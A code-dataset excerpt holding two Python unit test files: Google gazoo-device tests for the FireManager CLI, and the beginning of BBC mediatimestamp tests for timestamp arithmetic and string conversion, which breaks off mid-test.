f333b386f5993c8d4c9e12c89ebb620a0c4f5506
|
[
"Apache-2.0"
] | 14
|
2020-11-05T23:23:32.000Z
|
2022-03-01T18:59:29.000Z
|
gazoo_device/tests/unit_tests/fire_manager_test.py
|
google/gazoo-device
|
f333b386f5993c8d4c9e12c89ebb620a0c4f5506
|
[
"Apache-2.0"
] | null | null | null |
gazoo_device/tests/unit_tests/fire_manager_test.py
|
google/gazoo-device
|
f333b386f5993c8d4c9e12c89ebb620a0c4f5506
|
[
"Apache-2.0"
] | 5
|
2021-05-20T22:52:51.000Z
|
2022-02-21T08:46:21.000Z
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This test script verifies FireManager is working."""
import json
import multiprocessing
import os
import re
from unittest import mock
from gazoo_device import console
from gazoo_device import errors
from gazoo_device import fire_manager
from gazoo_device import gdm_logger
from gazoo_device import manager
from gazoo_device import package_registrar
from gazoo_device import testbed
from gazoo_device.switchboard import switchboard
from gazoo_device.tests.unit_tests import manager_test
from gazoo_device.tests.unit_tests.utils import fake_devices
from gazoo_device.tests.unit_tests.utils import unit_test_case
from gazoo_device.utility import usb_utils
import yaml
logger = gdm_logger.get_logger()
class FireManagerTests(manager_test.ManagerTestsSetup):
"""Unit tests for the fire_manager.py module (CLI extension of manager.py)."""
def setUp(self):
super().setUp()
with mock.patch.object(multiprocessing, "Manager"):
self.uut = fire_manager.FireManager(
debug=False, dev_debug=False, quiet=False)
self.mock_switchboard = mock.MagicMock(spec=switchboard.SwitchboardDefault)
self.mock_switchboard.device_name = "FakeDevice"
self.mock_switchboard.button_list = []
self.uut.create_switchboard = mock.MagicMock(
return_value=self.mock_switchboard)
self.uut.reload_configuration( # Load the mock device configuration files
device_file_name=self.files["device_file_name"],
options_file_name=self.files["device_options_file_name"],
testbeds_file_name=self.files["testbeds_file_name"],
gdm_config_file_name=self.files["gdm_config_file_name"],
log_directory=self.artifacts_directory)
def test_01a_man_all(self):
"""Test "gdm man" without parameters. Same as "gdm helpfull"."""
# Some examples from each device group. Examples don't have to be exhaustive
test_cases = {
"Primary": ["sshdevice"],
"Auxiliary": ["cambrionix", "powerswitch", "yepkit"]
}
with mock.patch.object(fire_manager.logger, "info") as mock_logger_info:
fire_manager.FireManager.man()
mock_logger_info.assert_called_once()
man = mock_logger_info.call_args[0][0]
for device_group, some_expected_devices in test_cases.items():
regex = r"{group}:\n((?:\s+\w+)+)\n\n".format(group=device_group)
actual_devices = re.search(regex, man).group(1).splitlines()
actual_devices = [device.strip() for device in actual_devices]
for expected_device in some_expected_devices:
self.assertIn(expected_device, actual_devices)
def test_01b_helpfull(self):
"""Verify the helpfull() method works."""
fire_manager.FireManager.helpfull()
def test_02_man_valid_device_types(self):
"""Test "gdm man <device_type>" for several device types."""
for device_type in ["sshdevice", "cambrionix"]:
fire_manager.FireManager.man(device_type)
def test_03_man_invalid_device_type(self):
"""Test "gdm man <device_type>" for an invalid device type."""
err_msg = "Device type tthdevice is not known."
with self.assertRaisesRegex(errors.DeviceError, err_msg):
fire_manager.FireManager.man("tthdevice")
with self.assertRaisesRegex(errors.DeviceError, err_msg):
fire_manager.FireManager.man("tthdevice", "reboot")
def test_04_man_class_member(self):
"""Test "gdm man <device_type> <class_member>" for valid attributes."""
test_cases = [
("sshdevice", "reboot"), # Method of a primary device
("sshdevice", "file_transfer"), # Capability of a primary device
("sshdevice", "_verify_reboot"), # Private method
("sshdevice", "communication_address"), # Property
("sshdevice", "console_port_name"), # Deprecated property alias
("cambrionix", "set_mode"), # Deprecated method alias
]
for device_type, class_member_name in test_cases:
fire_manager.FireManager.man(device_type, class_member_name)
def test_05_man_class_member_unknown(self):
"""Test "gdm man <device_type> <class member>" for invalid member."""
regex = r"sshdevice.*does not have attribute 'foo'"
with self.assertRaisesRegex(AttributeError, regex):
fire_manager.FireManager.man("sshdevice", "foo")
def test_06a_man_capability_attributes(self):
"""Test man on capability attributes ("gdm man device.capability.attr")."""
test_cases = (
# Capability method
("cambrionix", "switch_power", "power_off"),
# Capability property
("cambrionix", "switch_power", "supported_modes"),
# Capability deprecated property
("sshdevice", "usb_hub", "power_off"),
)
for device_type, capability, capability_attr in test_cases:
command = f"man {device_type} {capability} {capability_attr}"
with self.subTest(command=command):
fire_manager.FireManager.man(device_type, capability, capability_attr)
def test_06b_man_bad_capability_attribute(self):
"""Test man on nonexistent/non-capability class attributes."""
regex = r"cambrionix.switch_power.*does not have attribute 'foo'"
with self.assertRaisesRegex(AttributeError, regex):
fire_manager.FireManager.man("cambrionix", "switch_power", "foo")
regex = r"cambrionix.reboot.*is not a capability"
with self.assertRaisesRegex(TypeError, regex):
fire_manager.FireManager.man("cambrionix", "reboot", "something")
def test_07_man_nested_access(self):
"""Test nested access "gdm man <device_type>.<class member>"."""
expected_docs = fire_manager.FireManager.man("cambrionix", "reboot")
actual_docs = fire_manager.FireManager.man("cambrionix.reboot")
self.assertEqual(expected_docs, actual_docs)
expected_docs = fire_manager.FireManager.man("cambrionix", "switch_power",
"power_off")
actual_docs = fire_manager.FireManager.man(
"cambrionix.switch_power.power_off")
self.assertEqual(expected_docs, actual_docs)
def test_07a_man_dash_separated_vs_underscore(self):
"""Verify dash-separated names are converted to underscore_separated."""
expected_docs = fire_manager.FireManager.man("unifi_switch", "switch_power",
"power_off")
actual_docs = fire_manager.FireManager.man("unifi-switch", "switch-power",
"power-off")
self.assertEqual(expected_docs, actual_docs)
def test_08_man_device_type_deprecated(self):
"""Test "gdm man <device_type> --deprecated"."""
for device_type in ["sshdevice", "cambrionix"]:
fire_manager.FireManager.man(device_type, deprecated=True)
@mock.patch.object(
usb_utils,
"get_address_to_usb_info_dict",
return_value=manager_test.USB_INFO_DICT)
def test_10_print_usb_info(self, mock_usb_info_dict):
"""Test usb_info keys are printed."""
self.uut.print_usb_info()
mock_usb_info_dict.assert_called_once()
def test_11_issue(self):
"""Test that FireManager.issue() runs all health checks."""
with manager_test.MockOutDevices():
self.uut.issue("sshdevice-0000")
fake_devices.FakeSSHDevice.make_device_ready.assert_called_once_with("on")
def test_12_exec(self):
"""Test that FireManager.exec() does not run health checks."""
with manager_test.MockOutDevices():
self.uut.exec("sshdevice-0000")
fake_devices.FakeSSHDevice.make_device_ready.assert_called_once_with(
"off")
@mock.patch.object(fake_devices.FakeSSHDevice, "close")
def test_13_health_check_success_without_recover(self, mock_close):
"""Test FireManager.health_check(recover=False) success."""
with manager_test.MockOutDevices():
self.uut.health_check("sshdevice-0000", recover=False)
fake_devices.FakeSSHDevice.make_device_ready.assert_called_with(
setting="check_only")
mock_close.assert_called_once()
@mock.patch.object(fake_devices.FakeSSHDevice, "close")
def test_14_health_check_success_with_recover(self, mock_close):
"""Test FireManager.health_check(recover=True) success."""
with manager_test.MockOutDevices():
self.uut.health_check("sshdevice-0000", recover=True)
fake_devices.FakeSSHDevice.make_device_ready.assert_called_with(
setting="on")
mock_close.assert_called_once()
@mock.patch.object(fake_devices.FakeSSHDevice, "close")
def test_15_health_check_raises_on_error(self, mock_close):
"""Test that FireManager.health_check() raises when health checks fail."""
def mock_make_device_ready(setting="on"):
"""Succeeds if health checks are skipped, but fails if they do run."""
if setting == "off":
return
raise errors.DeviceNotResponsiveError("sshdevice-0000",
"Did not respond to 'foo' in 10s")
with manager_test.MockOutDevices():
with mock.patch.object(fake_devices.FakeSSHDevice, "make_device_ready",
side_effect=mock_make_device_ready):
with self.assertRaises(errors.DeviceNotResponsiveError):
self.uut.health_check("sshdevice-0000")
fake_devices.FakeSSHDevice.make_device_ready.assert_called_with(
setting="check_only")
mock_close.assert_called_once()
def test_16_get_prop(self):
"""Test FireManager.get_prop() retrieves all properties successfully."""
with manager_test.MockOutDevices():
self.uut.get_prop("sshdevice-0000")
def test_17_get_prop_single_property(self):
"""Test FireManager.get_prop() retrieves a single property successfully."""
with manager_test.MockOutDevices():
self.uut.get_prop("sshdevice-0000", "firmware_version")
def test_18_get_prop_manager_no_such_property(self):
"""Test get_prop() raises an error when property isn't in Manager config."""
with self.assertRaisesRegex(errors.DeviceError,
"Unable to find prop foobar in manager config"):
self.uut.get_prop("manager", "foobar")
def test_19_log_file_never_created(self):
"""Ensures stream device raises error if log file is never created."""
with mock.patch.object(
fire_manager, "MAX_TIME_TO_WAIT_FOR_INITATION", new=0.1):
with self.assertRaisesRegex(errors.DeviceError,
"Log file not created within 0.1 seconds"):
with manager_test.MockOutDevices():
self.uut.log("sshdevice-0000", self.device_log_file, duration=0.1)
def test_20_log_success(self):
"""Places logs in the file and invokes log and stops when requested."""
with manager_test.MockOutDevices():
self._create_log_file(2)
self.uut.log(
"sshdevice-0000", os.path.basename(self.device_log_file), duration=.2)
@mock.patch.object(testbed.Testbed, "make_testbed_ready")
def test_30_make_devices_ready_success(self, make_testbed_ready_mock):
"""Verify make_devices_ready returns is_healthy=True."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
testing_props = {
"paired": True,
"wifi_ssid": "GazooDevice!"
}
with manager_test.MockOutDevices():
mock_devices_health = json.loads(
self.uut.make_devices_ready(self.first_name + "," + self.second_name,
testing_props))
self.assertTrue(mock_devices_health[self.first_name]["is_healthy"])
self.assertTrue(mock_devices_health[self.second_name]["is_healthy"])
make_testbed_ready_mock.assert_called_once()
def test_31_make_devices_ready_single_device_success(self):
"""Verify _make_devices_ready_single_device returns is_healthy=True."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
with manager_test.MockOutDevices():
device = self.uut.create_device(self.first_name)
parameter_dict = {"sshdevice": {"setting": "on"}}
device_health = self.uut._make_devices_ready_single_device(
device, parameter_dict)
self.assertTrue(device_health[self.first_name]["is_healthy"])
def test_32_make_devices_ready_single_device_log_path(self):
"""Verify _make_devices_ready_single_device returns log path."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
with manager_test.MockOutDevices():
device = self.uut.create_device(self.first_name)
parameter_dict = {"sshdevice": {"setting": "on"}}
device_health = self.uut._make_devices_ready_single_device(
device, parameter_dict)
self.assertEqual(device_health[self.first_name]["logs"],
device.log_file_name)
def test_33_make_devices_ready_unhealthy_not_known(self):
"""Verify make_devices_ready returns correct unhealthy reason."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
unknown_device_name = "gobbly-gook"
expected_error = errors.DeviceError(
"Device {} is not known. Close matches: ".format(unknown_device_name))
with manager_test.MockOutDevices():
mock_devices_health = json.loads(
self.uut.make_devices_ready([unknown_device_name, self.first_name]))
self.assertFalse(mock_devices_health[self.first_name]["unhealthy_reason"])
self.assertEqual(
mock_devices_health[unknown_device_name]["unhealthy_reason"],
str(expected_error))
def test_34_make_devices_ready_unhealthy_not_responsive(self):
"""Verify make_devices_ready returns correct error."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
testing_props = {
"paired": True,
"wifi_ssid": "GazooDevice!"
}
sshdevice_1, sshdevice_2, cambrionix = [
"sshdevice-0000", "sshdevice-0001", "cambrionix-1234"]
expected_error = errors.DeviceNotResponsiveError(
sshdevice_1, "failed make_device_ready")
expected_testbed_error = errors.CheckTestbedReadyError(
"wifi ssid not pingable")
with manager_test.MockOutDevices():
with mock.patch.object(
fake_devices.FakeSSHDevice,
"make_device_ready",
side_effect=expected_error):
with mock.patch.object(
testbed.Testbed,
"make_testbed_ready",
side_effect=expected_testbed_error):
mock_devices_health = json.loads(
self.uut.make_devices_ready(
[sshdevice_1, sshdevice_2, cambrionix],
testing_props))
self.assertEqual(mock_devices_health[sshdevice_1]["err_type"],
type(expected_error).__name__)
self.assertEqual(mock_devices_health[sshdevice_2]["err_type"],
type(expected_error).__name__)
self.assertEqual(mock_devices_health["testbed"]["err_type"],
type(expected_testbed_error).__name__)
self.assertFalse(mock_devices_health[cambrionix]["err_type"])
def test_35_make_devices_ready_single_device_unhealthy_not_responsive(self):
"""Verify _make_devices_ready_single_device returns unhealthy_reason."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
expected_error = errors.DeviceNotResponsiveError(
self.first_name, "failed make_device_ready")
with manager_test.MockOutDevices():
device = self.uut.create_device("sshdevice-0000")
with mock.patch.object(
fake_devices.FakeSSHDevice,
"make_device_ready",
side_effect=expected_error):
parameter_dict = {"sshdevice": {"setting": "on"}}
device_health = self.uut._make_devices_ready_single_device(
device, parameter_dict)
self.assertEqual(device_health["sshdevice-0000"]["unhealthy_reason"],
str(expected_error))
def test_36_get_persistent_prop_devices_success(self):
"""Verify get_persistent_prop_devices returns persistent device props."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
with manager_test.MockOutDevices():
mock_devices_props = yaml.safe_load(
self.uut.get_persistent_prop_devices(
[self.first_name, self.second_name]))
for device_name in mock_devices_props:
expected_props = manager_test.FAKE_DEVICES["devices"][device_name]
self.assertEqual(mock_devices_props[device_name], expected_props)
def test_37_get_persistent_prop_devices_unhealthy_devices(self):
"""Verify get_persistent_prop_devices returns empty json object."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
exception = errors.DeviceNotResponsiveError(self.first_name,
"failed make_device_ready")
with manager_test.MockOutDevices():
with mock.patch.object(
self.uut, "get_device_configuration", side_effect=exception):
mock_devices_props = yaml.safe_load(
self.uut.get_persistent_prop_devices(
[self.first_name, self.second_name]))
for device_name in mock_devices_props:
self.assertEqual(mock_devices_props[device_name], {})
def test_38_construct_health_dict_from_exception(self):
"""Verify health dictionary constructed in proper format from exception."""
err_msg = "device is unresponsive"
checks_passed = ["first_health_check", "second_health_check"]
properties = {"prop_name": "prop_val", "other_prop_name": "other_prop_val"}
exception = errors.CheckDeviceReadyError("device-1234", err_msg)
exception.checks_passed = checks_passed
exception.properties = properties
health_dict = self.uut._construct_health_dict_from_exception(exception)
self.assertEqual(health_dict.get("is_healthy"), False)
self.assertIn(err_msg, health_dict.get("unhealthy_reason"))
self.assertEqual(health_dict.get("err_type"), "CheckDeviceReadyError")
self.assertEqual(health_dict.get("checks_passed"), checks_passed)
self.assertEqual(health_dict.get("properties"), properties)
@mock.patch.object(
package_registrar, "import_and_register", return_value=True)
@mock.patch.object(manager.logger, "info")
def test_40_register_already_registered(self, mock_info,
mock_import_and_register):
"""Test register() when package has already been registered."""
with mock.patch.object(
self.uut,
"config",
new={"cli_extension_packages": ["registered_package"]}):
self.uut.register("registered_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["registered_package"])
mock_import_and_register.assert_not_called()
mock_info.assert_called_once_with(
"Package 'registered_package' is already registered with GDM CLI.")
@mock.patch.object(
package_registrar, "import_and_register", return_value=False)
@mock.patch.object(manager.logger, "info")
def test_41_register_failure(self, mock_info, mock_import_and_register):
"""Test register() when package registration or import fails."""
with mock.patch.object(
self.uut, "config", new={"cli_extension_packages": []}):
self.uut.register("invalid_or_missing_package")
self.assertEqual(self.uut.config["cli_extension_packages"], [])
mock_import_and_register.assert_called_once_with(
"invalid_or_missing_package", include_cli_instructions=True)
mock_info.assert_not_called()
@mock.patch.object(
package_registrar, "import_and_register", return_value=True)
@mock.patch.object(manager.logger, "info")
def test_42_register_success(self, mock_info, mock_import_and_register):
"""Test register() when package registration succeeds."""
with mock.patch.object(
self.uut, "config", new={"cli_extension_packages": []}):
self.uut.register("valid_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["valid_package"])
mock_import_and_register.assert_called_once_with(
"valid_package", include_cli_instructions=True)
mock_info.assert_called_once_with(
"Registered package 'valid_package' with GDM CLI.")
@mock.patch.object(manager.logger, "info")
def test_45_unregister_not_found(self, mock_info):
"""Test unregister() when package isn't registered."""
with mock.patch.object(
self.uut, "config", new={"cli_extension_packages": ["other_package"]}):
self.uut.unregister("not_registered_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["other_package"])
mock_info.assert_called_once_with(
"Package 'not_registered_package' is not registered with GDM CLI.")
@mock.patch.object(manager.logger, "info")
def test_46_unregister_success(self, mock_info):
"""Test unregister() for a registered package."""
with mock.patch.object(
self.uut,
"config",
new={"cli_extension_packages": ["some_package", "other_package"]}):
self.uut.unregister("some_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["other_package"])
mock_info.assert_called_once_with(
"Removed package 'some_package' from GDM CLI.")
def test_console_success(self):
"""Tests running console on a device which supports it."""
with mock.patch.object(console.ConsoleApp, "run"):
self.uut.console("sshdevice-0000")
# Check that the device has been closed and stdout logging has been
# reenabled.
self.assertNotIn("sshdevice-0000", self.uut.get_open_device_names())
self.assertIn(gdm_logger._stdout_handler, logger.logging_thread._handlers)
def test_console_no_switchboard(self):
"""Tests that console raises an error if Switchboard is not supported."""
with self.assertRaisesRegex(
NotImplementedError,
"cambrionix-1234 does not have a Switchboard capability"):
self.uut.console("cambrionix-1234")
# Check that the device has been closed and stdout logging has been
# reenabled.
self.assertNotIn("cambrionix-1234", self.uut.get_open_device_names())
self.assertIn(gdm_logger._stdout_handler, logger.logging_thread._handlers)
if __name__ == "__main__":
unit_test_case.main()
| 45.913306
| 80
| 0.711676
|
794b145a5ff16868ef1d08c0fdac9b845ce66259
| 20,645
|
py
|
Python
|
tests/test_timestamp.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 3
|
2018-09-07T01:26:08.000Z
|
2019-09-13T12:37:50.000Z
|
tests/test_timestamp.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 16
|
2018-08-17T09:27:43.000Z
|
2022-02-04T17:26:21.000Z
|
tests/test_timestamp.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
from datetime import datetime
from dateutil import tz
from mediatimestamp.immutable import (
Timestamp,
TimeOffset,
TsValueError,
mediatimestamp,
SupportsMediaTimestamp,
SupportsMediaTimeOffset,
mediatimeoffset)
class TestTimestamp(unittest.TestCase):
def test_mediatimestamp(self):
to = TimeOffset()
self.assertNotIsInstance(to, SupportsMediaTimestamp)
ts = Timestamp()
self.assertIsInstance(ts, SupportsMediaTimestamp)
self.assertIsInstance(ts, SupportsMediaTimeOffset)
self.assertEqual(ts, mediatimestamp(ts))
self.assertEqual(ts, mediatimeoffset(ts))
class _convertable (object):
def __mediatimestamp__(self) -> Timestamp:
return Timestamp()
c = _convertable()
self.assertIsInstance(c, SupportsMediaTimestamp)
self.assertIsInstance(c, SupportsMediaTimeOffset)
self.assertEqual(ts, mediatimestamp(c))
self.assertEqual(ts, mediatimeoffset(c))
def test_MAX_NANOSEC(self):
self.assertEqual(Timestamp.MAX_NANOSEC, 1000000000)
def test_get_time_pythonic(self):
"""This tests that the fallback pure python implementation of get_time works as expected."""
test_ts = [
(1512489451.0, Timestamp(1512489451 + 37, 0)),
(1512489451.1, Timestamp(1512489451 + 37, 100000000))
]
for t in test_ts:
with mock.patch("time.time") as time:
time.return_value = t[0]
gottime = Timestamp.get_time()
self.assertEqual(gottime, t[1], msg="Times not equal, expected: %r, got %r" % (t[1], gottime))
def test_iaddsub(self):
"""This tests integer addition and subtraction on timestamps."""
ts = Timestamp(10, 0)
ts += TimeOffset(1, 2)
self.assertEqual(ts, Timestamp(11, 2))
ts -= TimeOffset(1, 2)
self.assertEqual(ts, Timestamp(10, 0))
ts -= TimeOffset(100, 5)
self.assertEqual(ts, Timestamp(90, 5, -1))
ts = Timestamp(281474976710655, 999999999)
ts += TimeOffset(0, 1)
self.assertEqual(ts, Timestamp(281474976710655, 999999999))
toff = TimeOffset(10, 0)
toff -= TimeOffset(100, 0)
self.assertEqual(toff, TimeOffset(90, 0, -1))
toff = TimeOffset(10, 0)
toff -= TimeOffset(0, 1)
self.assertEqual(toff, TimeOffset(9, 999999999))
toff = TimeOffset(10, 500000000)
toff += TimeOffset(0, 500000000)
self.assertEqual(toff, TimeOffset(11, 0))
toff = TimeOffset(10, 500000000, -1)
toff -= TimeOffset(0, 500000000)
self.assertEqual(toff, TimeOffset(11, 0, -1))
toff = TimeOffset(10, 0, -1)
toff += TimeOffset(0, 500000000)
self.assertEqual(toff, TimeOffset(9, 500000000, -1))
def test_addsub(self):
"""This tests addition and subtraction on timestamps."""
tests_ts = [
(Timestamp(10, 0), '+', TimeOffset(1, 2), Timestamp(11, 2)),
(Timestamp(11, 2), '-', TimeOffset(1, 2), Timestamp(10, 0)),
(TimeOffset(11, 2), '-', TimeOffset(1, 2), TimeOffset(10, 0)),
(Timestamp(10, 0), '-', TimeOffset(11, 2), Timestamp(1, 2, -1)),
(TimeOffset(10, 0), '-', TimeOffset(11, 2), TimeOffset(1, 2, -1)),
(TimeOffset(10, 0), '-', Timestamp(11, 2), TimeOffset(1, 2, -1)),
(Timestamp(10, 0), '-', Timestamp(11, 2), TimeOffset(1, 2, -1)),
(Timestamp(11, 2), '-', Timestamp(10, 0), TimeOffset(1, 2, 1)),
]
for t in tests_ts:
if t[1] == '+':
r = t[0] + t[2]
else:
r = t[0] - t[2]
self.assertEqual(r, t[3],
msg="{!r} {} {!r} = {!r}, expected {!r}".format(t[0], t[1], t[2], r, t[3]))
self.assertEqual(type(r), type(t[3]),
msg=("type({!r} {} {!r}) == {!r}, expected {!r}"
.format(t[0], t[1], t[2], type(r), type(t[3]))))
def test_multdiv(self):
"""This tests multiplication and division on timestamps."""
tests_ts = [
(TimeOffset(10, 10), '*', 0, TimeOffset(0, 0)),
(TimeOffset(10, 10), '*', 10, TimeOffset(100, 100)),
(10, '*', TimeOffset(10, 10), TimeOffset(100, 100)),
(TimeOffset(10, 10), '*', (-10), TimeOffset(100, 100, -1)),
(TimeOffset(10, 10, -1), '*', 10, TimeOffset(100, 100, -1)),
(TimeOffset(100, 100), '//', 10, TimeOffset(10, 10)),
(TimeOffset(100, 100), '//', -10, TimeOffset(10, 10, -1)),
(TimeOffset(100, 100, -1), '//', 10, TimeOffset(10, 10, -1)),
(TimeOffset(281474976710654, 0), '//', 281474976710655, TimeOffset(0, 999999999)),
(Timestamp(100, 100), '//', 10, TimeOffset(10, 10)),
(TimeOffset(100, 100), '/', 10, TimeOffset(10, 10)),
(TimeOffset(100, 100), '/', -10, TimeOffset(10, 10, -1)),
(TimeOffset(100, 100, -1), '/', 10, TimeOffset(10, 10, -1)),
(TimeOffset(281474976710654, 0), '/', 281474976710655, TimeOffset(0, 999999999)),
(Timestamp(100, 100), '/', 10, TimeOffset(10, 10)),
(Timestamp(10, 10), '*', 10, TimeOffset(100, 100)),
(10, '*', Timestamp(10, 10), TimeOffset(100, 100)),
]
for t in tests_ts:
if t[1] == '*':
r = t[0] * t[2]
elif t[1] == '//':
r = t[0] // t[2]
else:
r = t[0] / t[2]
self.assertEqual(r, t[3],
msg="{!r} {} {!r} == {!r}, expected {!r}".format(t[0], t[1], t[2], r, t[3]))
self.assertEqual(type(r), type(t[3]),
msg=("type({!r} {} {!r}) == {!r}, expected {!r}"
.format(t[0], t[1], t[2], type(r), type(t[3]))))
def test_compare(self):
"""This tests comparison of timestamps."""
self.assertEqual(Timestamp(1, 2), Timestamp(1, 2))
self.assertNotEqual(Timestamp(1, 2), Timestamp(1, 3))
self.assertLess(Timestamp(1, 0), Timestamp(1, 2))
self.assertLessEqual(Timestamp(1, 2), Timestamp(1, 2))
self.assertGreater(Timestamp(2, 0), Timestamp(1, 0))
self.assertGreaterEqual(Timestamp(2, 0), Timestamp(2, 0))
self.assertNotEqual(Timestamp(2, 0), Timestamp(3, 0))
self.assertEqual(Timestamp(2, 0), 2)
self.assertGreater(Timestamp(2, 0), 1)
self.assertLess(Timestamp(2, 0), 3)
self.assertLess(TimeOffset(2, 0), 3)
self.assertGreaterEqual(TimeOffset(1, 0, 1), TimeOffset(1, 0, -1))
def test_invalid_str(self):
"""This tests that invalid strings fed into from_str raise exceptions."""
tests_ts = [
"a",
"2015-02-17T12:53:48.5",
"2015-02T12:53:48.5",
"2015-02-17T12:53.5",
"12:53:48.5"
]
for t in tests_ts:
try:
Timestamp.from_str(t)
self.assertTrue(False)
except Exception:
pass
def test_invalid_int(self):
"""This tests that invalid int values fed into timestamp constructor get normalised."""
tests_ts = [
(Timestamp(-1, 0), Timestamp(1, 0, -1)),
(Timestamp(281474976710656, 0), Timestamp(281474976710655, 999999999)),
(Timestamp(0, 1000000000), Timestamp(1, 0)),
(Timestamp(0, -1), Timestamp(0, 1, -1)),
(Timestamp(5, -1000000007), Timestamp(3, 999999993))
]
for t in tests_ts:
self.assertEqual(t[0], t[1])
def test_convert_str(self):
"""This tests that various string formats can be converted to timestamps."""
tests_ts = [
("1:2", Timestamp(1, 2)),
("1.2", Timestamp(1, 200000000)),
("1", Timestamp(1, 0)),
("2015-02-17T12:53:48.5Z", Timestamp(1424177663, 500000000)),
("2015-02-17T12:53:48.000102003Z", Timestamp(1424177663, 102003))
]
for t in tests_ts:
ts = Timestamp.from_str(t[0])
self.assertTrue(isinstance(ts, Timestamp))
self.assertEqual(ts, t[1])
def test_convert_sec_nsec(self):
"""This tests that the conversion to and from TAI second:nanosecond pairs works as expected."""
tests_ts = [
("0:0", TimeOffset(0, 0), "0:0"),
("0:1", TimeOffset(0, 1), "0:1"),
("-0:1", TimeOffset(0, 1, -1), "-0:1"),
("5", TimeOffset(5, 0), "5:0"),
("5:1", TimeOffset(5, 1), "5:1"),
("-5:1", TimeOffset(5, 1, -1), "-5:1"),
("5:999999999", TimeOffset(5, 999999999), "5:999999999")
]
for t in tests_ts:
ts = TimeOffset.from_sec_nsec(t[0])
self.assertEqual(
ts,
t[1],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
ts_str = ts.to_sec_nsec()
self.assertEqual(
ts_str,
t[2],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
self.assertEqual(ts_str, str(ts))
def test_ts_convert_tai_sec_nsec(self):
"""This tests that the conversion to and from TAI second:nanosecond pairs works as expected."""
tests_ts = [
("0:0", Timestamp(0, 0), "0:0"),
("0:1", Timestamp(0, 1), "0:1"),
("-0:1", Timestamp(0, 1, -1), "-0:1"),
("5", Timestamp(5, 0), "5:0"),
("5:1", Timestamp(5, 1), "5:1"),
("-5:1", Timestamp(5, 1, -1), "-5:1"),
("5:999999999", Timestamp(5, 999999999), "5:999999999")
]
for t in tests_ts:
ts = Timestamp.from_sec_nsec(t[0])
self.assertIsInstance(ts, Timestamp,
msg=("Timestamp.from_sec_nsec({!r}) == {!r} not an instance of Timestamp"
.format(t[0], ts)))
self.assertEqual(
ts,
t[1],
msg="Timestamp.from_sec_nsec({!r}) == {!r}, expected {!r}".format(t[0], ts, t[1]))
ts_str = ts.to_sec_nsec()
self.assertEqual(
ts_str,
t[2],
msg="{!r}.to_sec_nsec() == {!r}, expected {!r}".format(ts, ts_str, t[2]))
self.assertEqual(ts_str, str(ts))
def test_convert_sec_frac(self):
"""This tests that the conversion to and from TAI seconds with fractional parts works as expected."""
tests_ts = [
("0.0", TimeOffset(0, 0), "0.0"),
("0.1", TimeOffset(0, 1000000000 // 10), "0.1"),
("-0.1", TimeOffset(0, 1000000000 // 10, -1), "-0.1"),
("5", TimeOffset(5, 0), "5.0"),
("5.1", TimeOffset(5, 1000000000 // 10), "5.1"),
("-5.1", TimeOffset(5, 1000000000 // 10, -1), "-5.1"),
("5.10000000", TimeOffset(5, 1000000000 // 10), "5.1"),
("5.123456789", TimeOffset(5, 123456789), "5.123456789"),
("5.000000001", TimeOffset(5, 1), "5.000000001"),
("5.0000000001", TimeOffset(5, 0), "5.0")
]
for t in tests_ts:
ts = TimeOffset.from_sec_frac(t[0])
self.assertEqual(
ts,
t[1],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
ts_str = ts.to_sec_frac()
self.assertEqual(
ts_str,
t[2],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
def test_ts_convert_tai_sec_frac(self):
"""This tests that the conversion to and from TAI seconds with fractional parts works as expected."""
tests_ts = [
("0.0", Timestamp(0, 0), "0.0"),
("0.1", Timestamp(0, 1000000000 // 10), "0.1"),
("-0.1", Timestamp(0, 100000000, -1), "-0.1"),
("5", Timestamp(5, 0), "5.0"),
("5.1", Timestamp(5, 1000000000 // 10), "5.1"),
("-5.1", Timestamp(5, 100000000, -1), "-5.1"),
("5.10000000", Timestamp(5, 1000000000 // 10), "5.1"),
("5.123456789", Timestamp(5, 123456789), "5.123456789"),
("5.000000001", Timestamp(5, 1), "5.000000001"),
("5.0000000001", Timestamp(5, 0), "5.0")
]
for t in tests_ts:
ts = Timestamp.from_sec_frac(t[0])
self.assertIsInstance(ts, Timestamp,
msg=("Timestamp.from_sec_frac({!r}) == {!r} not instance of Timestamp"
.format(t[0], ts)))
self.assertEqual(
ts,
t[1],
msg="Timestamp.from_sec_frac({!r}) == {!r}, expected {!r}".format(t[0], ts, t[1]))
ts_str = ts.to_sec_frac()
self.assertEqual(
ts_str,
t[2],
